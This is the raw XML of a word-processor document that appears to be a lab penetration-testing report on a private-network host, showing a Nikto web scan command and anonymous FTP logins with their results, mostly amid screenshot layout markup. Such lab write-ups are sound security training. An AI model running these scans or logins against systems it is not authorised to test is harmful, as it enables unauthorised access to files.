          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="538" w:lineRule="auto"/>
        <w:ind w:right="5102" w:hanging="226"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Web Vulnerability Scan Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Command used</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D24A82C" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="322" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="370" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -h </w:t>
      </w:r>
      <w:hyperlink r:id="rId14">
        <w:r>
          <w:rPr>
            <w:color w:val="467886"/>
            <w:u w:val="single" w:color="467886"/>
          </w:rPr>
          <w:t>http://192.168.240.129:8080</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId15">
        <w:r>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="62547999" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="276" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC9C5B6" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="169" w:line="393" w:lineRule="auto"/>
        <w:ind w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Identify HTTP misconfigurations, outdated software, or known vulnerabilities running on port 8080. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B2BCDF" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="323" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Expected Output Highlights</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0404841E" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="128"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Outdated HTTP server version </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4D22DA" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Insecure HTTP headers </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763EE89F" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="255" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="37" w:right="-22" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A0E574F" wp14:editId="53384E3C">
                <wp:extent cx="6035357" cy="3726968"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="18660" name="Group 18660"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6035357" cy="3726968"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6035357" cy="3726968"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1058" name="Rectangle 1058"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="205092" y="32254"/>
                            <a:ext cx="93238" cy="185075"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="484CECC6" w14:textId="77777777" w:rsidR="0086222C"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1059" name="Rectangle 1059"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="275196" y="0"/>
                            <a:ext cx="56314" cy="226001"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6D382603" w14:textId="77777777" w:rsidR="0086222C"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060" name="Rectangle 1060"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="433641" y="32254"/>
                            <a:ext cx="3380497" cy="184382"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="786DE2D3" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                                <w:jc w:val="left"/>
                              </w:pPr>
                              <w:r>
                                <w:t>Potentially dangerous directories exposed</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1061" name="Rectangle 1061"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2977578" y="2134"/>
                            <a:ext cx="50673" cy="224380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6456AE21"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62" name="Rectangle 1062"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5997257" y="3558261"/>
                            <a:ext cx="50673" cy="224380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="329F5642"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68" name="Picture 1068"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId16"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="14288" y="396494"/>
                            <a:ext cx="5943600" cy="3251200"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="1069" name="Shape 1069"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="382143"/>
                            <a:ext cx="5972175" cy="3279775"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5972175" h="3279775">
                                <a:moveTo>
                                  <a:pt x="0" y="3279775"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5972175" y="3279775"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="597217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60" style="width:475.225pt;height:293.462pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="60353,37269">
                <v:rect id="Rectangle 1058" style="position:absolute;width:932;height:1850;left:2050;top:322;"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1059" style="position:absolute;width:563;height:2260;left:2751;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060" style="position:absolute;width:33804;height:1843;left:4336;top:322;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve">Potentially dangerous directories exposed</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1061" style="position:absolute;width:506;height:2243;left:29775;top:21;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1062" style="position:absolute;width:506;height:2243;left:59972;top:35582;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 1068" style="position:absolute;width:59436;height:32512;left:142;top:3964;" filled="f">
                  <v:imagedata r:id="rId17"/>
                </v:shape>
                <v:shape id="Shape 1069" style="position:absolute;width:59721;height:32797;left:0;top:3821;" coordsize="5972175,3279775" path="m0,3279775l5972175,3279775l5972175,0l0,0x">
                  <v:stroke weight="2.25pt" endcap="flat" joinstyle="round" on="true" color="#ff0000"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="666F1D63" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC74218" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3F7879" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFD870E" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3320C5" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="538" w:lineRule="auto"/>
        <w:ind w:right="5102" w:hanging="226"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">FTP Anonymous Login Command used: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707CE2A1" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="541" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="6111"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="467886"/>
          <w:u w:val="single" w:color="467886"/>
        </w:rPr>
        <w:t>ftp 192.168.240.129</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Login: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020F3C1E" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="312"/>
        <w:ind w:left="730" w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Name: anonymous </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8207AB" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="314"/>
        <w:ind w:left="730" w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Password: [blank or anonymous@domain.com] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206CEA84" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6D87B3" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="159" w:line="399" w:lineRule="auto"/>
        <w:ind w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The FTP protocol allows users to access remote files. Misconfigures FTP servers often allow anonymous login, which is a common and serious security flaw. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFB84EA" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Result:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7526E942" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="397" w:lineRule="auto"/>
        <w:ind w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t>The server granted full access without requiring authentication. Users were able to browse directories, list files, and in some cases, download files directly.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CF8A86" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="255" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="37" w:right="-22" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="321E3A26" wp14:editId="4CA9A24A">
                <wp:extent cx="6035357" cy="3344190"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="18792" name="Group 18792"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6035357" cy="3344190"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6035357" cy="3344190"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1134" name="Rectangle 1134"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5997257" y="3175482"/>
                            <a:ext cx="50673" cy="224381"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5DE194ED"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37" name="Picture 1137"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId18"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="14288" y="14351"/>
                            <a:ext cx="5943600" cy="3251835"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="1138" name="Shape 1138"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5972175" cy="3280410"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5972175" h="3280410">
                                <a:moveTo>
                                  <a:pt x="0" y="3280410"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5972175" y="3280410"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="597217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792" style="width:475.225pt;height:263.322pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="60353,33441">
                <v:rect id="Rectangle 1134" style="position:absolute;width:506;height:2243;left:59972;top:31754;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 1137" style="position:absolute;width:59436;height:32518;left:142;top:143;" filled="f">
                  <v:imagedata r:id="rId19"/>
                </v:shape>
                <v:shape id="Shape 1138" style="position:absolute;width:59721;height:32804;left:0;top:0;" coordsize="5972175,3280410" path="m0,3280410l5972175,3280410l5972175,0l0,0x">
                  <v:stroke weight="2.25pt" endcap="flat" joinstyle="round" on="true" color="#ff0000"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="65023921" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215689F9" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="323" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="5102" w:hanging="226"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Anonymous FTP File Exploitation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF7C6EA" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="323" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Command used: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F96ADFD" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="541" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="6111"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="467886"/>
          <w:u w:val="single" w:color="467886"/>
        </w:rPr>
        <w:t>ftp 192.168.240.129</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Login: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429D987A" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="312"/>
        <w:ind w:left="730" w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Username: anonymous </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EF6ACB" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="313"/>
        <w:ind w:left="730" w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Password: (blank or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="467886"/>
          <w:u w:val="single" w:color="467886"/>
        </w:rPr>
        <w:t>anonymous@domain.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E0CBDC" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="323" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Result: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF96FCB" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Granted access and able to browse directories and list file without any authentication. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B42936A" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="308" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="-22" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22C3CC99" wp14:editId="4C8CC9A5">
                <wp:extent cx="6058865" cy="3675278"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="18732" name="Group 18732"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6058865" cy="3675278"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6058865" cy="3675278"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1199" name="Rectangle 1199"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="6020765" y="3175482"/>
                            <a:ext cx="50673" cy="224380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="557ECB08"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00" name="Rectangle 1200"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="3506571"/>
                            <a:ext cx="50673" cy="224380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="381BDD2E" w14:textId="77777777" w:rsidR="0086222C"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206" name="Picture 1206"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId20"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="37795" y="14351"/>
                            <a:ext cx="5943600" cy="3251835"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="1207" name="Shape 1207"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="23508" y="0"/>
                            <a:ext cx="5972175" cy="3280410"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5972175" h="3280410">
                                <a:moveTo>
                                  <a:pt x="0" y="3280410"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5972175" y="3280410"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="597217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732" style="width:477.076pt;height:289.392pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="60588,36752">
                <v:rect id="Rectangle 1199" style="position:absolute;width:506;height:2243;left:60207;top:31754;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
